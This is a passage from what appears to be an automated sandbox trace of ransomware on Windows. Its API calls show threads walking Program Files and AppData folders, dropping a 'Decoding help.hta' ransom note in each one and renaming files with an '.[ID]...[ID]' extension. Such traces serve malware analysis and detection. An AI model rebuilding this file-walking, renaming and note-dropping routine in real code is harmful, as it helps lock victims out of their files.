Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" [0061.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" [0061.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\currency.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\currency.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.273] FindNextFileW (in: hFindFile=0x5d8690, lpFindFileData=0x1199fd30 | out: lpFindFileData=0x1199fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.css", cAlternateFileName="")) returned 0 [0061.273] FindClose (in: hFindFile=0x5d8690 | out: hFindFile=0x5d8690) returned 1 Thread: id = 929 os_tid = 0x330 [0059.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*", lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3530 [0059.752] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.752] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.752] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.752] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11231710, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0059.752] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0059.752] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0059.752] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0059.752] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*" [0059.752] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*") returned 94 [0059.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033" [0059.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\*.*" [0059.753] GlobalMemoryStatus (in: lpBuffer=0x1299fd10 | out: lpBuffer=0x1299fd10) [0059.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109d09b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdfc [0059.758] CloseHandle (hObject=0xdfc) returned 1 [0059.758] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11231710, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0059.758] FindClose (in: hFindFile=0x5e3530 | out: hFindFile=0x5e3530) returned 1 Thread: id = 930 os_tid = 0x178 [0059.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*", lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.762] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.762] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.762] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.762] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x111e5450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x111e5450, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0059.762] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0059.762] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0059.762] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0059.762] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*" [0059.762] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*") returned 99 [0059.762] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033" [0059.762] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\*.*" [0059.762] GlobalMemoryStatus (in: lpBuffer=0x12a9fd10 | out: lpBuffer=0x12a9fd10) [0059.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10db6cf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf0 [0059.768] CloseHandle (hObject=0xdf0) returned 1 [0059.768] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x111e5450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x111e5450, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0059.769] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 931 os_tid = 0x55c [0059.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*", lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3530 [0059.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.761] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.761] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.761] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1172, dwReserved0=0x0, dwReserved1=0x0, cFileName="picturePuzzle.css", cAlternateFileName="")) returned 1 [0059.761] lstrcpyW (in: lpString1=0x5e88c10, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" [0059.761] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned 85 [0059.761] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\Decoding help.hta" [0059.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0059.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xde8 [0061.274] WriteFile (in: hFile=0xde8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x12b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x12b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.275] CloseHandle (hObject=0xde8) returned 1 [0061.275] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.275] lstrcmpiW (lpString1="Decoding help.hta", lpString2="picturePuzzle.css") returned -1 [0061.275] lstrlenW (lpString="picturePuzzle.css") returned 17 [0061.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*" [0061.275] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\*.*") returned 85 [0061.275] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\", lpString2="picturePuzzle.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" [0061.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" [0061.275] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.981] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1454, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 Thread: id = 932 os_tid = 0x500 [0059.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*", lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0059.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.764] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.764] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.764] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0x0, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0059.765] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*" [0059.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*") returned 100 [0059.765] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\Decoding help.hta" [0059.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\decoding help.hta")) returned 0xffffffff [0059.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xde8 [0061.276] WriteFile (in: hFile=0xde8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x12c9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x12c9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.277] CloseHandle (hObject=0xde8) returned 1 [0061.277] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.277] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0x0, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0061.277] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 933 os_tid = 0x4a0 [0059.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*", lpFindFileData=0x14b9fd30 | out: lpFindFileData=0x14b9fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.773] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x14b9fd30 | out: lpFindFileData=0x14b9fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.773] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.773] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.774] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x14b9fd30 | out: lpFindFileData=0x14b9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, 